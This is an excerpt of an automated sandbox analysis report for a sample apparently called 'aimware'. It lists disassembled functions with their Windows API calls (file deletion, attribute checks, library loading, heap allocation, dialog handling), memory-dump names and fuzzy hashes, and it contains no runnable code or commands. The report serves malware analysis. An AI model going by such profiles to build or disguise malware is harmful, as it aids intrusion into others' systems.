Opcode ID: d23160a12f5481ee46d036d31a4dcb8384479d709fc22dc4c23f3e850a708e8d
Instruction ID: d53330e3965179cbd1625e481b9d9e484267bbb6fc723df017e60e4fddca1bc8
Opcode Fuzzy Hash: d23160a12f5481ee46d036d31a4dcb8384479d709fc22dc4c23f3e850a708e8d
Instruction Fuzzy Hash: B6F0A0322001497BDF11AF60DC45FEA37ACBB14385F448050B845D6161DB71CA95EB50

Function 00ABA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00AB977F,?,?,00AB95CF,?,?,?,?,?,00AE2641,000000FF), ref: 00ABA1F1

Part of subcall function 00ABBB03: _wcslen.LIBCMT ref: 00ABBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00AB977F,?,?,00AB95CF,?,?,?,?,?,00AE2641), ref: 00ABA21F

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: f3c78da0a8ac6ad0d5a52f525b777acd09c1111135fb88cd7e29f9478929b354
Instruction ID: 99581d168c2e9e14100fb4c0076fe64883f95860a35bd228db47c226d81a0ece
Opcode Fuzzy Hash: f3c78da0a8ac6ad0d5a52f525b777acd09c1111135fb88cd7e29f9478929b354
Instruction Fuzzy Hash: E1E092321402096BEF01DFA4DC45FE9375CAB18382F488021B945D6062EB61DE85DB60

Function 00ACAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00AE2641,000000FF), ref: 00ACACB0
CoUninitialize.COMBASE(?,?,?,?,00AE2641,000000FF), ref: 00ACACB5

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 507a569d4db51fb1ffd1b91f3e20d548eb9c0ef4cb5a6169c24c4e1bad1de510
Instruction ID: 66266c74c607bf986540fe4958d4f6984e4475d1522d16b8454aac4b8f4a6905
Opcode Fuzzy Hash: 507a569d4db51fb1ffd1b91f3e20d548eb9c0ef4cb5a6169c24c4e1bad1de510
Instruction Fuzzy Hash: 88E06D72604A50EFCB00DB9DDC46B59FBACFB88B20F04436AF416D37A0CB74A801CA90

Function 00ABA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00ABA23A,?,00AB755C,?,?,?,?), ref: 00ABA254

Part of subcall function 00ABBB03: _wcslen.LIBCMT ref: 00ABBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00ABA23A,?,00AB755C,?,?,?,?), ref: 00ABA280

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: fda01a53c39a81859b2fa21b52ffd440f964f477df161962fd323a6ba778267a
Instruction ID: b532ae9506788785099a7a2012eb7b72e25084d9cd1dc4930a387ebc18bd119e
Opcode Fuzzy Hash: fda01a53c39a81859b2fa21b52ffd440f964f477df161962fd323a6ba778267a
Instruction Fuzzy Hash: 47E06D325001246ACF60EB64CC09BD97B6CAB183E2F044261BD45E71A1D6709E458AA0

Function 00ACDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00ACDEEC

Part of subcall function 00AB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB40A5

SetDlgItemTextW.USER32(00000065,?), ref: 00ACDF03

Part of subcall function 00ACB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00ACB579
Part of subcall function 00ACB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ACB58A
Part of subcall function 00ACB568: IsDialogMessageW.USER32(00010470,?), ref: 00ACB59E
Part of subcall function 00ACB568: TranslateMessage.USER32(?), ref: 00ACB5AC
Part of subcall function 00ACB568: DispatchMessageW.USER32(?), ref: 00ACB5B6

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 97eafc5d7cd3dd7b98d0d54bda25256c89f5b81b39f8a8bdce30cef45d109a33
Instruction ID: 51558c9b0614b01711dc94e16306ab9e7d5cea2d9b7d217f447c17c842acd023
Opcode Fuzzy Hash: 97eafc5d7cd3dd7b98d0d54bda25256c89f5b81b39f8a8bdce30cef45d109a33
Instruction Fuzzy Hash: 55E092B650424826DF02EBA4DD06FEE3BAC5B05786F440855B201EB0A3EA79EA119661

Function 00AC081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00AC0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00ABF2D8,Crypt32.dll,00000000,00ABF35C,?,?,00ABF33E,?,?,?), ref: 00AC0858

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 2640012935df315b3d9285eee67882be70ec9fde9cfce8daae630a361a653947
Instruction ID: cd1cd81f84e3bc5c7eeb1346ff92377e6909d650220a26af9f34dd21583c5b9d
Opcode Fuzzy Hash: 2640012935df315b3d9285eee67882be70ec9fde9cfce8daae630a361a653947
Instruction Fuzzy Hash: 7EE048764041586BDF11EB94DD49FDA77ACEF093D1F0400657645D3004D674DA84CBF0

Function 00ACA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00ACA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00ACA3E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 27d4e3d5cc658fc08c418dfe65bc7d56689fcadf0a4e3e2c6efda818fb4868fe
Instruction ID: 94ff0c76f66f306e04366277f8c5a913d1954bdec678fee0946433f377b2e12a
Opcode Fuzzy Hash: 27d4e3d5cc658fc08c418dfe65bc7d56689fcadf0a4e3e2c6efda818fb4868fe
Instruction Fuzzy Hash: D0E0ED75500218EBCB10DF55C541BA9BBF8EB14364F11C05EE85697301E374AE04DB91

Function 00AD2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AD2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00AD2BB5

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 4dbc9b4c4fc504b03df84ebc3fce5917453a0b74a0561ef1b788f57e26b056c7
Instruction ID: c710edfa50d918c4a57358546950e9d27b75c47437f261c92739574841167951
Opcode Fuzzy Hash: 4dbc9b4c4fc504b03df84ebc3fce5917453a0b74a0561ef1b788f57e26b056c7
Instruction Fuzzy Hash: 63D0A735154200144F14AB702A0A7543355AD71B717A01A87E023857D1EAD04140D312

Function 00AB12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00AB1306
ShowWindow.USER32(00000000), ref: 00AB130D

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 013911b18b6226066e7e99d7f6bc15818856bdb22fda478617e6f270baedde01
Instruction ID: b8c2636645374f52c58efb1753af61070bb7db3214ab47b2ef05aa498e184914
Opcode Fuzzy Hash: 013911b18b6226066e7e99d7f6bc15818856bdb22fda478617e6f270baedde01
Instruction Fuzzy Hash: FBC012B245C200BECB010BB4DC09C6BBBE8ABA5712F04C908B0A5D2060EA38C160DB11

Function 00AB1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB1A09

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9a2d48f0763eebdabdd67cba9f3a401997b78a9692591639e5b1641c205e57c8
Instruction ID: a7cc1ebeb21ae18bd448966792b6506be195ff41ec7992078e42cea5063c1a6f
Opcode Fuzzy Hash: 9a2d48f0763eebdabdd67cba9f3a401997b78a9692591639e5b1641c205e57c8
Instruction Fuzzy Hash: E3C19E70A002549FEF19CF68C8A8BF97BA9EF16310F5801B9EC459F297DB309945CB61

Function 00AB3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB3BBF

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b1493ebecc614a4b3fa3d0fc0915e6d5d44203d7440025755106e2bf3556e395
Instruction ID: 283c29b9720fa041518ebe1b9926924fc88d0af43e28843447a7d1fc8de4e439
Opcode Fuzzy Hash: b1493ebecc614a4b3fa3d0fc0915e6d5d44203d7440025755106e2bf3556e395
Instruction Fuzzy Hash: D671D472500B849EDB25DB74C955AE7BBEDAF15300F40492EF1AB87243EA327A48DF11

Function 00AB8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB8289

Part of subcall function 00AB13DC: __EH_prolog.LIBCMT ref: 00AB13E1

Part of subcall function 00ABA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00ABA598

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 581b26c441eba0f318f06d50e35661ad4a0b7cc70d2a2331ebd1adaccd464184
Instruction ID: 2956693bc9c591a7a95a5a3981c4dd36f965b40648075c2ba703420cfa484814
Opcode Fuzzy Hash: 581b26c441eba0f318f06d50e35661ad4a0b7cc70d2a2331ebd1adaccd464184
Instruction Fuzzy Hash: 7741A6719446589ADB20EB64CD55BEAB7BCAF00304F4404EBE18A97083EB795FC9DF50

Function 00AB13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB13E1

Part of subcall function 00AB5E37: __EH_prolog.LIBCMT ref: 00AB5E3C

Part of subcall function 00ABCE40: __EH_prolog.LIBCMT ref: 00ABCE45

Part of subcall function 00ABB505: __EH_prolog.LIBCMT ref: 00ABB50A

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 547212be9d107a693de70751c0866e0dc26934f875da7e6ef61fc64d789100a7
Instruction ID: ab032b4be17ded40218d9024bf6323d5a6a59e77a3451b7737240b96935777dd
Opcode Fuzzy Hash: 547212be9d107a693de70751c0866e0dc26934f875da7e6ef61fc64d789100a7
Instruction Fuzzy Hash: 854148B0905B409EE724CF398995AE7FBE9BF18300F504A2ED5EE83282CB716654CB10

Function 00AB13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB13E1

Part of subcall function 00AB5E37: __EH_prolog.LIBCMT ref: 00AB5E3C

Part of subcall function 00ABCE40: __EH_prolog.LIBCMT ref: 00ABCE45

Part of subcall function 00ABB505: __EH_prolog.LIBCMT ref: 00ABB50A

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c8144b5f179d75d72b1c5740485efd204c47d1744795cfaab70096b9e1be3629
Instruction ID: 3d2d43503d705f9d5d354110eb37b04de1dbb68596c5cd7d19883afaae639035
Opcode Fuzzy Hash: c8144b5f179d75d72b1c5740485efd204c47d1744795cfaab70096b9e1be3629
Instruction Fuzzy Hash: FE4147B0905B409EE724DF798985AE6FBE9FF18300F504A2ED5FE83282CB716654CB10

Function 00ACB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00ACB098

Part of subcall function 00AB13DC: __EH_prolog.LIBCMT ref: 00AB13E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2077fe3310fdd6a51e896f184ab5464688f2cb50cda38a8d23db7152c840ce3e
Instruction ID: 07911a9fc3c7e293fde423f5066295e390f845974553bc728f70b81b7582ea44
Opcode Fuzzy Hash: 2077fe3310fdd6a51e896f184ab5464688f2cb50cda38a8d23db7152c840ce3e
Instruction Fuzzy Hash: 8F318F75C14249DECF15DF64C961AEEB7B8AF09300F54449EE409B7242DB35AE04CB71

Function 00ADAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00ADACF8

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 73393e2b45d7cf88f7703e295aeb9cc36a99d4387f0772d914379ad5ea11b1ac
Instruction ID: e53104b145f2c080126835aa6b54aea8e68e2fc02577d0e33aad45eb128da3eb
Opcode Fuzzy Hash: 73393e2b45d7cf88f7703e295aeb9cc36a99d4387f0772d914379ad5ea11b1ac
Instruction Fuzzy Hash: 6A110633A012259F9F22DF68EC8099A73A6AB943307164222FC57AF354D730DC1287D2

Function 00AB9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB921A

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2db1733d8f9ea52c7d35f3883b640d36c3db7a07a1938c695dc6bbbd135606fc
Instruction ID: 6838ee407593064e959ca3d7c99c518d57b0a6200bd8d45ec267aa22765920ac
Opcode Fuzzy Hash: 2db1733d8f9ea52c7d35f3883b640d36c3db7a07a1938c695dc6bbbd135606fc
Instruction Fuzzy Hash: 4C016573D00569ABCF11ABA8CE91ADFB779AF88750F014625E916BB253DA34CD04C6A0

Function 00ADC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00ADB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AD9813,00000001,00000364,?,00AD3F73,00000050,?,00AF1030,00000200), ref: 00ADB177

_free.LIBCMT ref: 00ADC4E5

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 45bb3ccfb690c913731a1baebb2f760b0569463624f787c91db23978cb4d111a
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: 4F01DBB62003066BE7318F55984596AFBEDEB85370F65051EE595833C1EA30A905C774

Function 00ADB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AD9813,00000001,00000364,?,00AD3F73,00000050,?,00AF1030,00000200), ref: 00ADB177

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
